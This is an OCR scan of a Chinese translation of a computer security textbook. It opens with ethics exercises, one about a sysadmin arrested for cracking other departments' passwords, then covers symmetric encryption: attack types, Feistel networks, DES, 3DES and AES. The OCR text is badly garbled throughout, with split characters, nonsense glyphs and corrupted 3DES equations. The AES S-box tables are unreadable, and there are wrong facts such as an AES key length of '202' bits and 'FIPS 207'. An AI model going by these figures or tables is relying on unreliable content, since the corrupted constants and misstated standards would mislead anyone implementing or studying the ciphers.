假设 你 是 一 个 大 型 机 构 某 部 门 的 中 级 系统 管理 员 。 你 试图 鼓励 你 的 用 户 拥 有 良好 的 口令 策略 ， 并 
且 经 常 运行 密码 破译 工具 来 检查 那些 正在 使 用 的 口令 是 否 容易 被 猜 到 。 你 已 经 意识 到 最 近 发 生 了 
黑客 破译 口令 的 行为 。 在 一 种 热情 的 驱使 下 ， 你 从 机 构 的 其 他 部 门 转移 密码 文件 并 企图 破解 它们 。 
令 你 害怕 的 是 ， 你 发 现在 你 过 去 曾经 工作 过 的 部 门 〈 但 现在 关系 已 经 相当 紧张 )， 大 约 有 40% 的 口 
令 可 能 会 被 猜 中 (包括 那个 部 门 的 副 总 裁 的 口令 ， 其 口令 是 “president ”! )。 你 悄悄 地 试探 了 以 
前 的 几 个 同事 并 且 暗 自 希 望 情 况 可 能 得 到 改善 。 一 两 个 星期 后 ， 你 再 次 转移 密码 文件 进行 分 析 希 
望 情况 能 够 得 到 改善 。 然 而 ， 情 况 并 非 如 此 。 不 幸 的 是 ， 这 一 次 你 的 一 个 同事 注意 到 了 这 件 事 情 。 
作为 一 个 相当 “教条 ”的 人 ， 他 向 高 级 主管 告知 了 这 件 事 情 ， 并 于 当晚 你 以 涉嫌 黑客 行为 而 被 逮 
捕 而 且 失 去 了 工作 。 你 做 错 了 什么 事 ? 简要 指出 你 可 能 用 来 为 你 自己 的 活动 辩护 的 证 据 。 参 考 
图 19-6 至 图 19-8 中 列 出 的 职业 行为 规范 。 

在 本 章 19.4 节 中 阐述 的 三 种 道德 规范 (ACM, IEEE 和 AITP) 都 包含 : 个 人 尊严 和 人 的 价值 ; 个 
人 诚信 ; 工作 责任 ; 信息 保密 ; 公共 安全 、 健 康 和 福利 ; 参与 专业 协会 ;以 及 与 社会 能 力 相 关 的 
技术 知识 等 主题 。 为 每 个 主题 或 者 每 个 规范 创建 一 个 表格 ， 显 示 规 范 中 阐明 主题 的 相关 条 款 。 
本 书 的 网 站 上 包括 1982 年 的 ACM 职业 行为 规范 的 副本 。 与 1997 年 的 ACM 职业 行为 规范 〈 见 
图 19-6 ) 作 以 比较 。 

a. 有 没有 1982 年 规范 里 有 而 1997 年 规范 里 没有 的 内 容 ? 给 出 没有 这 些 内 容 的 一 个 理由 。 

b. 有 没有 1997 年 规范 里 有 而 1982 年 规范 里 没有 的 内 容 ? 给 出 没有 这 些 内 容 的 一 个 理由 。 

本 书 的 网 站 上 包括 1979 年 IEEE 道德 规范 的 副本 。 将 其 与 2006 年 IEEE 道德 规范 ( 见 图 19-7 ) 作 
个 比较 。 

a. 有 没有 1979 年 规范 中 有 而 2006 年 规范 中 没有 的 内 容 ? 给 出 没有 这 些 内 容 的 一 个 理由 。 

b. 有 没有 2006 年 规范 里 有 而 1979 年 规范 里 没有 的 内 容 ? 给 出 没有 这 些 内 容 的 一 个 理由 。 

本 书 的 网 站 上 包含 了 1999 年 软件 工程 道德 和 专业 实践 规范 (版 本 5.2 )， 它 也 由 ACM/IEEE-CS 联 
合 特种 部 队 推 荐 使 用 。 将 这 一 规范 与 本 章 (图 19-6 至 图 19-8 ) 提 及 的 三 种 规范 进行 比较 。 说 说 
该 规范 与 书 中 提 及 的 三 种 规范 的 不 同 之 处 。 
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学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

© 解释 对 称 加 密 的 基本 原理 ; 

o 理解 Feistel 密码 结构 的 重要 作用 ，; 
描述 DES HAHAHA; 


区 别 2 密 钥 和 3 密 钥 3DES; 
描述 AES 的 结构 和 作用 ; 

比较 和 区 分 流 密码 和 分 组 密码 ; 
区 分 主要 的 分 组 密码 的 工作 模式 ; 
讨论 密 钥 分 发 中 的 问题 。 





对 称 加 密 ， 也 称 传统 加 密 、 私 钥 或 单 钥 加 密 ， 是 20 世纪 70 年 代 后 期 9 公 钥 密码 产生 之 前 
唯一 的 一 种 加 密 技术 。 现 在 它 仍 是 两 种 类 型 的 加 密 中 使 用 最 广泛 的 一 种 。 

本 章 首 先 介绍 对 称 加 密 过 程 的 一 般 模型 ， 了 解 传统 加 密 算法 的 使 用 环境 。 然 后 讨论 三 个 重 
要 的 分 组 加 密 算法 : DES, =E DES 和 AES。 接 下 来 ， 介 绍 对 称 流 加 密 并 描述 现在 广泛 使 用 
的 流 密 码 RC4。 最 后 讨论 这 些 算法 在 实现 机 密 性 中 的 应 用 。 


20.1 对称 加 密 原 理 


这 里 ,我 们 应 该 再 看 一 下 在 2.1 节 所 介绍 的 内 容 。 回 忆 一 下 对 称 加 密 方案 的 5 个 组 成 部 分 
( 见 图 2-1): 
e 明文 (plaintext): 作为 算法 的 输入 ， 是 原始 可 理解 的 消息 和 数据 。 
e 加 密 算法 (encryption algorithm): 加 密 算法 对 明文 进行 各 种 代 换 和 变换 。 
o 密 钥 (secret key): 密 钥 也 是 加 密 算法 的 输入 。 算 法 所 用 的 特定 的 代 换 和 替换 依赖 于 
密 钥 。 
e EX (ciphertext): 作为 算法 的 输出 ， 看 起 来 完全 随机 而 杂乱 的 数据 ,依赖 于 明文 和 密 
钥 。 对 于 给 定 的 消息 ， 不 同 的 密 钥 将 产生 不 同 的 密 文 。 
© 解密 算法 (decryption algorithm): 本 质 上 是 加 密 算法 的 逆 ， 输 入 密 文 和 密 钥 可 以 用 解密 
638 算法 恢复 明文 。 


20.1.1 密码 编码 学 


密码 编码 系统 通常 依据 以 下 三 个 角度 进行 划分 : 

1. 将 明文 转换 为 密 文 的 运算 类 型 。 所 有 的 加 密 算法 都 是 基于 两 个 原理 : 代 换 和 置换 。 代 换 
是 将 明文 中 的 每 个 元 素 (如 位 、 字 母 、 位 组 和 字母 组 等 ) 映射 成 男 一 个 元 素 ; 置换 是 将 明文 中 
元 素 重新 排列 。 上 述 运算 的 基本 要 求 是 不 允许 信息 丢失 (也 就 是 说 ， 所 有 的 运算 都 是 可 逆 的 )。 


O ” 公 和 钥 密 码 于 1976 年 第 一 次 在 公开 文献 中 提出 ， 但 是 NSA (National Security Agency) 宣称 他 们 几 年 前 就 发 现 
了 这 种 加 密 体制 。 
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大 多 数 密码 体制 ， 也 称 为 乘积 系统 ， 都 使 用 了 多 层 代 换 和 置换 。 

2. 所 用 密 钥 的 数目 。 如 果 发 送 方 和 接收 方 使 用 相同 的 密 钥 ， 这 种 体制 就 称 为 对 称 加 密 、 单 
钥 加 密 或 传统 加 密 。 如 果 发 送 方 和 接收 方 使 用 不 同 的 密 钥 ， 这 种 体制 则 称 为 非 对称 加 密 、 双 铀 
加 密 或 公 钥 加 密 。 

3. 处 理 明 文 的 方式 。 分 组 密码 每 次 处 理 一 个 输入 分 组 ， 相 应 地 输出 一 个 输出 分 组 。 而 流 窗 
码 则 是 连续 地 处 理 输 入 元 素 ， 每 次 输出 一 个 元 素 。 


20.1.2 ”密码 分 析 


试图 发 现 明文 和 密 钥 的 过 程 称 为 密码 分 析 。 密 码 分 析 者 所 用 的 策略 是 基于 加 密 方案 的 特征 
和 他 所 能 利用 的 信息 的 。 

表 20-1 概括 了 密码 攻击 的 几 种 类 型 ， 它 们 都 是 基于 密码 分 析 者 所 知道 的 信息 数量 的 。 表 
中 唯 密 文 (ciphertext only) 攻击 难度 最 大 。 在 有 些 情 况 下 ， 敌 手 甚至 不 知道 加 密 算 法 ， 但 我 们 
通常 假设 敌手 知道 。 这 种 情况 下 ， 一 种 可 能 的 攻击 是 试 遍 所 有 可 能 密 钥 的 蛮 力 (brute-force) 攻 
击 。 如 果 密 钥 空 间 非常 大 ， 这 种 攻击 方法 就 不 太 实 际 了 。 因 此 攻击 者 必须 依赖 密 文 本 身 的 分 
析 ， 而 这 一 般 要 运用 各 种 统计 方法 。 使 用 这 种 方法 ， 敌 手 对 隐 仿 的 明文 类 型 必须 要 有 所 了 和 解 ， 
比如 ， 明 文 是 英文 文本 还 是 法 文 文本 ， 是 EXE 可 执行 文件 还 是 Java 源 列表 文件 、 会 计 文件 ， 
等 等 。 


20-1 基于 加 密 信息 的 攻击 类 型 


攻击 类 型 密码 分 析 者 已 知 的 信息 
。 加 密 算法 
唯 密 文 攻击 。 要 解密 的 密 广 
。 加 密 算法 
已 知 明文 攻击 。 要 解密 的 密 广 
。 用 同一 密 钥 加 密 的 一 个 或 多 个 明文 一 _ 密 文 对 
。 加 密 算法 
选择 明文 攻击 。 要 解密 的 密 广 
。 分 析 者 任意 选择 的 明文 ， 和 用 (与 待 解密 密 文 ) 同一 密 钥 加 密 的 密 文 
。 加 密 算法 
选择 密 文 攻击 。 要 解密 的 密 文 
。 分 析 者 有 目的 地 选择 的 一 些 密 文 ， 用 (与 待 解密 密 文 ) 同一 密 钥 解密 的 对 应 明文 
。 加 密 算法 
选择 文本 攻击 + er 


。 分 析 者 任意 选择 的 明文 ， 用 〈 与 待 解密 密 文 ) 同一 密 钥 加 密 的 对 应 明文 
。 分 析 者 有 目的 地 选择 的 一 些 密 文 ， 用 (与 待 解密 密 文 ) 同一 密 钥 解密 的 对 应 密 文 


唯 密 文 攻击 是 最 容易 防范 的 ， 因 为 攻击 者 拥有 的 相关 信息 量 最 少 。 不 过 ， 在 很 多 情况 下 ， 
分 析 者 可 以 得 到 更 多 信息 。 分 析 者 可 以 捕获 到 一 段 或 更 多 的 明文 信息 及 相应 的 密 文 ， 也 可 以 知 
道 某 段 明 文 信息 的 格式 等 。 比 如 ， 按 照 Postscript 格式 加 密 的 文件 总 是 以 相同 的 格式 开头 ， 电 
子 金融 信息 往往 有 标准 化 的 文件 头 或 者 标志 等 。 这 些 都 是 已 知 明文 攻击 的 例子 。 拥 有 这 些 知 识 
的 分 析 者 就 可 以 从 转换 明文 的 方法 人 手 来 推导 出 密 钥 。 

与 已 知 明文 攻击 相关 的 是 可 能 词 (probable-word) 攻击 。 如 果 攻 击 者 处 理 的 是 一 般 散 文 信 
息 ， 他 可 能 对 信息 的 内 容 一 无 所 知 。 但 是 如 果 处 理 的 是 一 些 特 定 信息 ， 他 就 可 能 知道 其 中 的 部 
分 信息 。 例 如 ， 对 于 一 个 完整 的 正在 传输 的 会 计 文件 ， 攻 击 者 可 能 知道 放 在 文件 最 前 面 的 某 些 
密 钥 词 。 再 比如 ， 某 个 公司 开发 的 程序 源 代码 可 能 含有 该 公司 的 版 权 信 息 ， 并 放 在 某 个 标准 
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位 置 。 

如 果 分 析 者 能 够 通过 某 种 方式 ， 让 发 送 方 在 发 送 的 信息 中 插入 一 段 由 他 选择 的 信息 ， 那 么 
选择 明文 攻击 就 有 可 能 实现 。 一 般 来 说 ， 如 果 分 析 者 有 办 法 选择 明文 加 密 ， 那 么 他 将 故意 选取 
那些 最 有 可 能 恢复 出 密 钥 的 数据 。 

表 20-1 还 列 出 了 另外 两 种 类 型 的 攻击 方法 : 选择 密 文 攻击 和 选择 文本 攻击 。 它 们 在 密码 
分 析 中 很 少 用 到 ， 但 不 失 为 两 种 较 好 的 可 能 的 攻击 方法 。 

只 有 相对 比较 弱 的 算法 才 抵挡 不 住 密 文 攻击 。 一 般 情况 下 ， 加 密 算法 起 码 要 能 经 受 得 住 已 
知 明文 攻击 才 行 。 

如 果 密 文 是 由 满足 以 下 一 条 或 全 部 标准 的 体制 产生 的 ， 那 么 该 加 密 体制 是 计算 上 安全 的 。 

。 破译 密码 的 代价 超出 密 文 信息 的 价值 。 

。 破译 密码 的 时 间 超出 密 文 信息 的 有 效 生 命 期 。 

不 幸 的 是 ， 成 功 地 分 析出 密 文 所 需要 的 工作 量 是 很 难 估计 的 。 但 是 ， 假 设 算法 没有 内 在 
的 数学 方面 的 弱点 ， 而 且 已 经 指出 是 利用 蛮 力 攻击 ， 则 此 时 我 们 可 以 对 代价 和 时 间 做 出 合理 的 
估计 。 

蛮 力 攻击 是 试 遍 所 有 的 可 能 密 钥 ， 直 到 sid iainh 
有 一 -个 合法 的 密 钥 能 够 把 密 文 还 原 成 明文 的 攻 
击 方法 。 平 均 来 说 ， 要 获得 成 功 必 须 尝 试 所 有 
可 能 密 钥 的 一 半 。 这 类 攻击 在 2.1 节 中 已 做 过 
讨论 。 
20.1.3 Feistel 密码 结构 


1973 年 IBM 公司 AY Horst Feistel[FEIS73] 
第 一 次 描述 了 许多 对 称 加 密 算法 包括 DES 的 一 
种 结构 ， 如 图 20-1 所 示 。 加 密 算法 的 输入 是 长 
为 2w 位 的 明文 组 和 密 钥 天。 明文 组 被 分 为 两 
部 分 : Lo 和 Ro。 这 两 半 部 分 数据 经 过 n 轮 迭 代 
后 组 合成 密 文 组。 第 i 轮 迭 代 的 输入 Li! 和 Ril 
来 自 于 上 轮 和 迭代 的 输出 ， 而 子 密 钥 K 是 由 整个 
密 钥 天 推导 出 的 。 一 般 地 ， 大 不同 于 天 ， 也 互 
不 相同 。 

每 轮 和 迭代 都 有 相同 的 结构 。 代 换 作 用 在 数 
据 的 左 半 部 分 。 它 用 轮 函数 F 作用 数据 的 右 半 
部 分 后 ， 再 与 左 半 部 分 数据 进行 异 或 (XOR)。 
每 轮 和 迭代 的 轮 函数 相同 但 输入 的 子 密 钥 不 同 。 
代 换 之 后 ， 交 换 数据 的 两 半 部 分 完成 置换 。 

Feistel 分 组 密码 结构 是 所 有 对 称 加 密 算法 
使 用 的 最 普遍 的 结构 。 一 般 来 说 ， 对 称 分 组 密 
码 由 一 系列 轮 组 成 ， 每 轮 依 据 一 个 密 钥 值 进行 
代 换 和 置换 。Feistel 结构 的 具体 实现 依赖 于 以 
下 参数 和 特征 : 

o 分 组 长 度 (block size): 分 组 越 长 意味 密 文 (2w 位 ) 

着 安全 性 越 高 (其 他 情况 相同 )， 但 是 图 20-1 经 典 Feistel 网 络 
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会 降低 加 /解密 速度 。128 位 的 分 组 长 度 比较 合理 ， 能 适合 广泛 分 组 密码 的 要 求 。 

© BAKE (key size): 密 钥 较 长 同样 意味 着 安全 性 较 高 ， 但 会 降低 加 /解密 速度 。 通 常 
使 用 的 密 钥 长 度 是 128 位 。 

o 和 迭代 轮 数 (number of round): Feistel 密码 的 本 质 在 于 单 轮 不 能 提供 足够 的 安全 性 , 但 
多 轮 加 密 可 取得 很 高 的 安全 性 。 和 迭代 轮 数 的 典型 值 是 16。 
© 子 密 钥 产生 算法 (subkey generation algorithm); 子 密 钥 产生 越 复 杂 ， 密 码 分 析 越 困难 。 
o 轮 函 数 (round function): 同样 ， 轮 函数 越 复杂 ， 抗 攻击 的 能 力 就 越 强 。 
设计 对 称 分 组 密码 还 有 两 个 其 他 方面 的 考虑 : 
o 快速 软件 加 /解密 (fast software encryption/decryption) : 许多 情况 下 ， 加 密 算法 被 嵌 人 
到 应 用 程序 工具 中 ， 而 做 成 硬件 不 太 方便 。 因 此 ， 算 法 的 执行 速度 很 重要 。 

© 简化 分 析 难 度 (ease of analysis): 尽管 我 们 把 算法 设计 得 尽 可 能 不 易 受 到 密码 分 析 的 攻 
击 ， 但 是 将 算法 设计 得 较 简单 却 也 有 利于 我 们 进行 分 析 。 也 就 是 说 ， 如 果 算 法 描述 起 
来 简洁 清楚 ， 那 么 分 析 其 脆弱 性 也 就 容易 一 些 ， 因 而 可 以 开发 出 更 强 的 算法 。 不 过 ， 
DES 并 没有 容易 分 析 的 方法 。 

对 称 分 组 密码 的 解密 ， 本 质 上 和 加 密 过 程 一 致 。 其 规则 如 下 : 将 密 文 作为 算法 的 输入 , 但 
需要 逆序 使 用 子 密 钥 K. REH, BEER K,， 第 二 轮 使 用 K ， 直 到 最 后 一 轮 使 用 Ki。 
这 是 一 个 很 好 的 特点 ， 因 为 这 意味 着 我 们 不 需要 实现 两 个 算法 : 一 个 用 作 加 密 ， 而 另 一 个 用 作 
解密 。 


20.2 ”数据 加 密 标准 


分 组 密码 是 使 用 最 广泛 的 对 称 加 密 算法 。 分 组 密码 将 固定 长 度 的 明文 分 组 加 密生 成 与 明文 
分 组 等 长 的 密 文 分 组 。 接 下 来 我 们 将 集中 讨论 三 种 最 重要 的 对 称 分 组 密码 算法 : 数据 加 密 标准 
(DES), =H DES (3DES) 和 高 级 加 密 标准 (AES). 


20.2.1 数据 加 密 标 准 


使 用 最 广泛 的 加 密 体 制 是 数据 加 密 标准 (DES), EF 1977 年 被 美国 国家 标准 局 即 现在 的 
国家 标准 和 技术 研究 所 (NIST) 采纳 为 联邦 信息 处 理 标 准 46 (FIPS PUB 46 )。 这 个 算法 本 身 被 
称 为 数据 加 密 算法 (DEA) 9。 

DES 算法 可 以 如 下 描述 : DES 采用 了 64 位 的 明文 长 度 和 56 位 的 密 钥 长 度 。 更 长 的 明文 
被 分 成 多 个 64 位 的 分 组 。DES 结构 只 是 Feistel 网 络 结构 的 微小 的 变化 ， 如 图 20-1 所 示 。 它 包 
含 16 轮 的 处 理 过 程 ， 由 原始 的 56 位 密 钥 ， 产 生 16 个 子 密 钥 ， 分 别 用 于 每 一 轮 。 

DES 的 解密 过 程 本 质 上 和 加 密 过 程 是 一 样 的。 规则 如 下 : 将 密 文 作为 DES 算法 的 输入 ， 
但 是 ， 按 逆序 使 用 子 密 钥 K. CHD, Kis 用 于 第 1 轮 的 迭代 , Kis 用 于 第 2 轮 的 迭代 ， 等 等 ， 
直到 Ki 用 于 第 16 轮 即 最 后 一 轮 的 迭代 。 


20.2.2 三 重 DES 


=H DES (3DES) 的 标准 化 最 初出 现在 1985 年 的 ANSI 标准 X9.17 中 ,为 了 把 它 用 于 金 
融 领 域 。1999 年 随 着 FIPS PUB 46-3 的 公布 ， 把 它 合并 为 数据 加 密 标 准 (DES) 的 一 部 分 。 
3DES 使 用 三 个 密 钥 执行 三 次 DES 算法 ， 具 体 运算 过 程 依照 加 密 - 解密 - 加 密 (Encryption- 


O 术语 有 点 混乱 ， 直 到 现在 还 经 常 将 DES 和 DEA 互 换 使 用 。 最 近 DES 的 文件 中 包括 关于 DEA 和 三 重 DEA 
(3DES) 的 描述 ， 在 这 里 描述 DEA， 接 下 来 描述 3DEA。DEA 和 3DES 都 是 DES 的 组 成 部 分 。 最 近 ， 官 方 
术语 采用 了 3DES， 并 把 三 重 DEA 称 为 三 重 DES， 简 写 为 3DES。 为 了 方便 ， 我 们 将 采用 3DES HSK. 
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Decription-Encryption, EDE) 的 顺序 ( 见 图 20-2a)， 写 成 方程 为 : 
C=E(K3, D(K2, E(K,, P))) 
其 中 
C= xX 
已 一 明文 
E[K, Y= (#845 K xt X D0 
E[K, Y|= (8 FARA K xt Y RE 
解密 时 逆序 使 用 这 些 密 钥 简单 地 执行 相同 的 操作 ( 见 图 20-2b): 
P=D(Ki, E(K2, D(Ks, C))) 
3DES 加 密 过 程 中 的 第 二 步 使 用 的 解密 没有 密码 方面 的 意义 。 它 的 唯一 好 处 是 让 3DES 的 
使 用 者 能 够 解密 原来 单 重 DES 使 用 者 加 密 的 数据 : 
C=E(K, D(Ki, E(Ki, P)))=E[K, P] 
通过 三 个 不 同 的 密 钥 ，3DES 的 有 效 密 K K K 


1 2 3 


钥 长 度 为 168 位 。FIPS 46-3 同样 允许 使 用 | 
两 个 密 钥 ， 令 乓 = 后 ， 这 样 密 钥 长 度 就 为 p lon A ES B (E) =a 
112 位 。FIPS 46-3 包含 了 下 列 3DES 的 规定 : ee 2] ES 


。3DES 是 FIPS 批准 的 可 选 对 称 加 密 va 
算法 。 K, K, K, 

。 使 用 单个 56 位 密 钥 的 原始 DES， | 
只 允许 在 以 往 系统 的 标准 下 使 用 ，c_ aa pate jr 
新 设计 必须 支持 3DES。 b) 解密 


e 鼓励 使 用 以 往 DES 系统 的 政府 机 构 
转换 到 3DES 系统 。 
e 预计 3DES 与 高 级 加 密 标 准 (AES) 将 作为 FIPS 批准 的 算法 共存 ， 并 允许 3DES 逐步 
过 渡 到 AES。 
容易 看 出 ，3DES 是 一 个 强大 的 算法 ， 因 为 底层 密码 算法 是 DEA，DEA 声称 的 对 基于 其 
算法 的 破译 抗 抵抗 能 力 ，3DES 同样 也 有 。 不 仅 如 此 ， 由 于 168 位 的 密 钥 长 度 ， 穷 举 攻击 更 没 
有 可 能 。 
最 终 AES 将 取代 3DES， 但 是 这 个 过 程 将 花费 很 多 年 的 时 间 。NIST 预言 在 可 预见 的 将 来 
3DES 仍 将 是 被 批准 使 用 的 算法 (为 美国 政府 所 使 用 )。 


20.3 ”高 级 加 密 标准 


高 级 加 密 标准 ( AES) 作为 一 条 联邦 信息 处 理 标准 (FIPS 207) 发 布 出 来 。 它 试图 利用 更 
安全 有 效 的 算法 取代 DES 和 3DES。 


20.3.1 算法 综述 


在 AES 中 ， 分 组 长 度 为 128 位 ， 密 钥 长 度 可 以 被 指定 为 128、202 或 256 位 。 这 里 ,我 们 
假定 密 钥 长 度 为 128 位 ， 该 长 度 可 能 是 使 用 最 广泛 的 。 

20-3 显示 了 AES 的 完整 结构 。 加 密 算法 的 输入 分 组 和 解密 算法 的 输入 分 组 均 为 128 
位 。 在 FIPS PUB 197 中 ， 输 入 分 组 是 用 以 字 节 为 单位 的 方 阵 描述 的 。 该 分 组 被 复制 到 State 数 
组 。 这 个 数组 在 加 密 和 解密 的 每 个 阶段 都 会 被 改变 。 在 执行 了 最 后 的 阶段 后 ，State 被 复制 到 
输出 矩阵 中 。 同 样 ，128 位 的 密 钥 也 是 用 以 字 节 为 单位 的 矩阵 描述 的 。 然 后 ， 这 个 密 钥 被 扩展 


图 20-2 =# DES 
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成 一 个 子 密 钥 字 的 数组 ; 每 个 字 由 4 个 字 节 组 成 ，128 位 的 密 钥 最 终 扩展 为 44 FFI. E 
阵 中 字 节 的 排列 顺序 是 按 列 排列 的 。 例 如 ， 加 密 算法 中 每 个 128 位 分 组 输入 的 前 4 个 字 节 被 按 
顺序 放 在 了 in 矩阵 的 第 一 列 ， 接 着 的 4 个 字 节 放 在 第 二 列 ， 以 此 类 推 。 同 样 ， 扩 展 密 钥 的 前 4 
个 字 节 (一 个 字 ) 被 放 在 w 矩阵 的 第 一 列 。 


明文 





>- keam Jo 
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kpi 


Æ 20-3 AES 的 加 密 和 解密 


接 下 来 的 注释 可 以 帮助 我 们 认识 AES: 

1. AES 结构 的 一 个 显著 特征 是 该 结构 不 是 Feistel 结构 。 回 想 一 下 经 典 的 Feistel 结构 ， 数 
据 分 组 中 的 一 半 被 用 来 修改 数据 分 组 中 的 另 一 半 ， 然 后 交换 这 两 部 分 。AES 没有 使 用 Feistel 
结构 ， 而 是 每 一 轮 使 用 代 换 和 移 位 时 都 并 行 地 处 理 整个 数据 分 组 。 

2. 输入 的 密 钥 被 扩展 成 44 个 32 位 的 字 所 组 成 的 数组 wil A4 个 不 同 的 字 ( 128 位 ) 作 
为 该 轮 的 轮 密 钥 。 

3. 该 结构 由 4 个 不 同 的 阶段 组 成 ， 包 括 一 个 置换 和 三 个 代 换 。 

© 字 节 代 换 (substitute byte): 使 用 一 个 表 ， 称 为 一 个 S 盒 9， 完 成 分 组 中 的 按 字 节 

代 换 。 
© 行 移 位 (shift row): 一 个 简单 的 用 一 行 代替 另 一 行 的 置换 。 


O 术语 S SRARRE| (substitution box) 通常 用 在 对 称 密码 的 描述 中 ， 指 代 “ 表 格 - 查找 ”类 型 的 交换 机 制 
中 使 用 的 表格 。 
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© 列 混淆 (mix column): 对 列 的 每 个 字 节 做 替换 ， 是 一 个 与 本 列 全 部 字 节 有 关 的 函数 。 

o 轮 密 钥 加 (add round key): 利用 当前 分 组 和 扩展 密 钥 的 一 部 分 进行 按 位 XOR。 

4. 算 法 结构 非常 简单 。 对 加 密 和 解密 操作 ， 算 法 由 轮 密 钥 加 开始 ， 接 着 执行 9 轮 迭 代 运 
算 ， 每 轮 都 包含 所 有 4 个 阶段 的 代 换 ， 然 后 执行 只 包含 三 个 阶段 的 第 10 轮 的 运算 。 图 20-4 描 
646| 述 了 包含 整个 加 密 轮 的 结构 。 
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Æ 20-4 AES 的 一 轮 加 密 过 程 


5. 仅仅 在 轮 密 钥 加 阶段 中 使 用 密 铀 。 由 于 这 个 原因 ， 该 算法 的 开始 和 结束 都 有 轮 密 钥 加 的 
阶段 。 如 果 将 其 他 不 需要 密 钥 的 运算 用 于 算法 的 开始 和 结束 ， 那 么 在 不 需要 知道 密 钥 的 情况 下 
就 能 计算 其 逆 ， 故 不 能 增加 算法 的 安全 性 。 

6. 就 轮 密 钥 加 本 身 来 说 ， 是 不 难 破译 的 。 而 另外 三 个 阶段 一 起 提供 了 位 混乱 的 功能 。 因 为 
这 些 阶段 没有 使 用 密 钥 ， 故 就 它们 自身 而 言 ， 并 未 提供 算法 的 安全 性 。 我 们 把 该 算法 看 成 是 一 
个 分 组 的 XOR 加 密 ( 轮 密 钥 加 )， 接 着 对 这 个 分 组 混淆 〈 其 他 的 三 个 阶段 )， 再 接着 又 是 XOR 
加 密 等 交替 执行 的 操作 。 这 种 方式 非常 有 效 且 非常 安全 。 

7. 每 个 阶段 均 可 逆 。 对 字 节 变换 、 行 移 位 和 列 混淆 ， 在 解密 算法 中 用 与 它们 相对 应 的 逆 函 
数 。 轮 密 钥 加 的 逆 就 是 用 同样 的 轮 密 钥 和 分 组 相 异 或 。 其 原理 就 是 4 外 4 外 B=B。 

8. 与 大 多 数 分 组 密码 一 样 ， 解 密 算 法 是 按 逆序 方式 利用 了 扩展 密 钥 。 然 而 ， 解 密 算 法 和 加 

密 算法 不 一 样 。 这 是 由 AES 的 特定 结构 决定 的 。 

9. 一 旦 将 所 有 的 4 个 阶段 求 逆 ,很 容易 证 明 解 密 的 确 可 以 恢复 原来 的 明文 。 图 20-3 中 加 

密 和 解密 流程 在 纵向 上 是 相反 的 。 在 每 个 水 平 点 上 (如 图 中 虚线 所 示 )，State 在 加 密 和 解密 中 
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是 一 样 的 。 
10. 加 密 和 解密 过 程 的 最 后 一 轮 只 包含 三 个 阶段 。 这 也 是 由 AES 的 特定 结构 所 决定 的 ， 而 
且 也 是 密码 算法 可 疼 性 所 要 求 的 。 


20.3.2 ”算法 的 细节 


我 们 现在 简单 地 看 一 下 AES 的 更 多 细节 。 

字 节 代 换 变换 (Substitute Byte Transformation) 正 向 字 节 代 换 变换 (forward substitute byte 
transformation, SubBytes) 是 一 个 简单 的 查 表 操 作 ( 见 表 20-2a)。AES 定义 了 一 个 S 盒 ， 它 是 
由 16 x 16 个 字 节 值 (byte value) 组 成 的 和 矩阵， 包含 了 由 256 个 所 有 可 能 的 8 比特 (位 ) 值 组 成 
的 一 个 排列 。State 中 每 个 字 节 按照 如 下 方式 映射 为 一 个 新 的 字 节 : 把 该 字 节 的 最 左边 4 位 作 
为 行 值 ， 最 右边 4 位 作为 列 值 。 然 后 取出 S 盒 中 对 应 行列 元 素 作为 8 位 的 输出 值 。 例 如 ， 十 六 
进 制 值 S {95} 对 应 S 盒 中 的 行 值 9 ， 列 值 是 5，S 盒 中 在 此 位 置 的 值 是 {2A}。 因 此 ，{95} 被 映 
射 为 {2A}。 


表 20-2 AES 的 S 盒 
a)S& 






















| 
Po fofti tet satatstot 7] siotaltsatc|of{e|e | 
[o | 63 | 7c | 77 | 7p | Fe | op | oF | cs | 30 | 0 | 67 | 2B | Fe | D7 | ap | 76 | 
| t | ca] s2 | co | | a | 59 | 47 | Fo | aD Da | a2 | ar | 9c | a4 | 72 | 0 | 
| 2 | 7 | rp | 93 | 26 | 36 | ar | Fr | cc | 34 | as | es | Fi |n | ve | 31 | 15 | 
| 3 |o [cz | 23 | ca | 18 | 96 | os | 9a | o7 | 12 | 80 | 2 | ep | 27 | Be | 75 | 
„|4 | |s | 2c | 1a | ip | ot | sa | ao | 52 | 38 | bo | 3 | 29 | | oF | 8 
| 5 | 53 | i | o0 | ep | 20 | Fc | or | sp | 6a | cp | Be | 39 | 4a | ac | se | cr 
| 6 | po | er | aa| re | 43 | ap | 33 | es | 45 | Fo | o | mF | 50 | 3c | oF | as] 
| 7 | si | a3 | 40 | er | 92 | 9p | 38 | Fs | wc | Bo | da} 21 | 10 | FF | r3 |o | 
| 8 [cp | oc | 13 | ec | se | 97 | a4 | 17 | ca | a7 | ve | 30 | 64 | sd | 19 | 73 | 
| 9 | 60 |s | ar | vc | 22 | 2a | 90 | 88 | 46 | ee | Bs | 14 | De | se | 0B | be | 
[a | eo | 32 | 3a | oa | 49 | 06 | 24 | sc | co | vs | ac| 62 |o | 95 | ea | 79 | 
| B | e7 | cs | 37 | 6p | ap | bs |æ | as | oc | ss | Fa | ea | 65 | 7A | Az | os | 
|c | pa | 78 | 25 | 2 | ic | a6 | Ba | co | es | pp | 74 | ir | 4B | Bp | sp | sa | 
x |p | 7 | 3c | ps | 66 | as | 03 | Fo | oF | ot | 35 | 57 | wo | 86 | cr | w | 9 | 
[E | er | re | 98 |u | 69 | bo | se | 94 | op | ie | 87 | 9 | ce | 55 | 28 | DF | 
|r [sc | at |s | op | Br | re | 42 | o8 | ai | 99 | 2D | oF | Bo | 54 | we | 16 | 





b) ŽS 













EN 

| fotite|ste}s{ot7]sio}aleatc|o{e rk | 
|o | 52 | 0» | 6a | ds | 30 | 36 | as | 38 | BF | 40 | a3 |o] si |r | D7 | FB 
„ [7c | | 9 | | 9p | ar | rr | a7 | 34 | se | 43 |44 | ca | De | |c] 
* [2 [sa [7p [94 [32 [as [co [25 [a [ee [ac [95 | op [a2 | ra | cs | ae | 
| 3 | og | 2e | ai | 66 | 28 | bo | 24 | B2] 76 | sp | a2 | 49 | 6D | se | Di | 25 | 
| 4 | 72 | Fs | ro | o | 86 | 68 | 98 | 16 | vs | as | sc [cc] so | 65 | Bo | 9 | 


© 在 FIPS PUB 197 中 ,十 六 进 制 数 由 外 加 花 括号 的 形式 表示 。 这 里 采用 这 种 方式 。 
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( 续 ) 



















| 
| | ol2l3l4|5|5|71s8191A aa cpasTEF | 
| 5 | 6c | 70 | 48 | so | rp | ep | Bo jpa] se | is | 46 | 57 | a7 | 80 | 9D | 4 | 
